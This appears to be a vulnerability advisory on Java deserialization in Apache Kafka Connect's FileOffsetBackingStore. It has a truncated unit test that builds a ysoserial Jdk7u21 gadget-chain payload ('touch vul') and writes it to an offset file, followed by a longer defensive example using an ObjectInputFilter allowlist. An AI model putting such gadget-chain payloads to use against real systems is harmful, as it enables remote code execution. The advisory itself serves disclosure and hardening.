Apache Kafka deserialization vulnerability

- AV AC AU C I A
Published: 2025-04-13
Revised: 2025-04-13

The Apache Kafka Connect runtime (the connect-runtime module, which ships FileOffsetBackingStore) contains a Java deserialization vulnerability: FileOffsetBackingStore loads its offset file with ObjectInputStream, so anyone who can write that file can plant a serialized gadget chain that executes during readObject(), which leads to remote code execution. It is exploited reliably on JDK 1.7.0_05 with the ysoserial Jdk7u21 gadget chain. Below is a unit test for it. The source truncates the method body; what it shows is kept as published, and only a class wrapper (name assumed) and the serialize() helper implied by the imports have been added so that the fragment compiles:

```java
import junit.framework.Test;
import junit.framework.TestCase;
import junit.framework.TestSuite;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.Jdk7u21;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

// Class wrapper added so the published fragment compiles (name assumed).
public class KafkaDeserTest extends TestCase {

    // Helper implied by the imports (ByteArrayOutputStream/ObjectOutputStream):
    // Java-serializes the gadget object in the form FileOffsetBackingStore reads back.
    private static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    public void test_Kafka_Deser() throws Exception {
        StandaloneConfig config;
        String projectDir = System.getProperty("user.dir");
        // ysoserial Jdk7u21 chain: the command runs when the offset file is deserialized
        Jdk7u21 jdk7u21 = new Jdk7u21();
        Object o = jdk7u21.getObject("touch vul");
        byte[] ser = serialize(o);
        // the serialized payload is written to the file the store will be pointed at
        File tempFile = new File(projectDir + "/payload.ser");
        ...
    }
}
```
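To make the root cause concrete, here is an added example (not Kafka's own code) that puts the unsafe read pattern the advisory describes next to a hardened reader. It assumes the offset file is a serialized java.util.HashMap<byte[], byte[]>, which is what FileOffsetBackingStore persists, and it uses the JDK 9+ java.io.ObjectInputFilter API (on 8u121+ the equivalent lives in sun.misc). The class names OffsetFileDeser, loadUnsafe, loadFiltered and OFFSET_FILTER are this example's own. No gadget chain is built; a serialized LinkedHashSet stands in for "an object the offset file must never contain", which is enough to show that the unsafe reader deserializes it fully before the instanceof check runs, while the filtered reader rejects it before any class is resolved.

```java
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Arrays;
import java.util.HashMap;
import java.util.LinkedHashSet;

// Added example, not Kafka's code. Offset file format assumed: HashMap<byte[], byte[]>.
public class OffsetFileDeser {

    // Unsafe pattern: every serializable class on the classpath is resolved and
    // instantiated by readObject(); a gadget chain in the file runs before the
    // instanceof check below ever gets a chance to reject it.
    @SuppressWarnings("unchecked")
    static HashMap<byte[], byte[]> loadUnsafe(Path file) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(Files.newInputStream(file))) {
            Object obj = in.readObject();
            if (!(obj instanceof HashMap)) {
                throw new IOException("unexpected offset file content: " + obj.getClass().getName());
            }
            return (HashMap<byte[], byte[]>) obj;
        }
    }

    // Hardened: allowlist exactly java.util.HashMap and reject everything else.
    // Primitive arrays (byte[]) are not matched by class-name patterns and pass as
    // UNDECIDED; maxarray caps their length and maxdepth caps graph nesting.
    // A rejected class throws InvalidClassException before it is instantiated.
    static final ObjectInputFilter OFFSET_FILTER =
        ObjectInputFilter.Config.createFilter("maxdepth=4;maxarray=1000000;java.util.HashMap;!*");

    @SuppressWarnings("unchecked")
    static HashMap<byte[], byte[]> loadFiltered(Path file) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(Files.newInputStream(file))) {
            in.setObjectInputFilter(OFFSET_FILTER);
            Object obj = in.readObject();
            if (!(obj instanceof HashMap)) {
                throw new IOException("unexpected offset file content: " + obj.getClass().getName());
            }
            return (HashMap<byte[], byte[]>) obj;
        }
    }

    static void writeObject(Path file, Object o) throws IOException {
        try (ObjectOutputStream out = new ObjectOutputStream(Files.newOutputStream(file))) {
            out.writeObject(o);
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample input: a legitimate offset map.
        Path legit = Files.createTempFile("offsets", ".ser");
        HashMap<byte[], byte[]> offsets = new HashMap<>();
        offsets.put("connector-1".getBytes(StandardCharsets.UTF_8), "42".getBytes(StandardCharsets.UTF_8));
        writeObject(legit, offsets);
        System.out.println("unsafe   reader, legit file: " + loadUnsafe(legit).size() + " entry");
        System.out.println("filtered reader, legit file: " + loadFiltered(legit).size() + " entry");

        // Constructed hostile input: a class the offset file should never contain
        // (stand-in for a gadget chain; a LinkedHashSet is harmless by itself).
        Path hostile = Files.createTempFile("offsets", ".ser");
        writeObject(hostile, new LinkedHashSet<>(Arrays.asList("not", "a", "map")));
        try {
            loadUnsafe(hostile);
        } catch (IOException e) {
            // The object was already fully deserialized; the check came too late.
            System.out.println("unsafe   reader, hostile file: " + e.getMessage());
        }
        try {
            loadFiltered(hostile);
        } catch (InvalidClassException e) {
            // Rejected by the filter while resolving the class descriptor.
            System.out.println("filtered reader, hostile file: rejected, " + e.getMessage());
        }

        Files.deleteIfExists(legit);
        Files.deleteIfExists(hostile);
    }
}
```

The filter is a defence in depth for the reader, not a substitute for keeping the offset file unwritable by anyone other than the Connect worker: a gadget chain must be rejected at class-resolution time, because by the time readObject() returns an object for a type check, the chain has already run. A JVM-wide equivalent can be set with the jdk.serialFilter system property, which also covers ObjectInputStream instances the application does not construct itself.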

No Exp or PoC available yet
There are currently 0 affected product records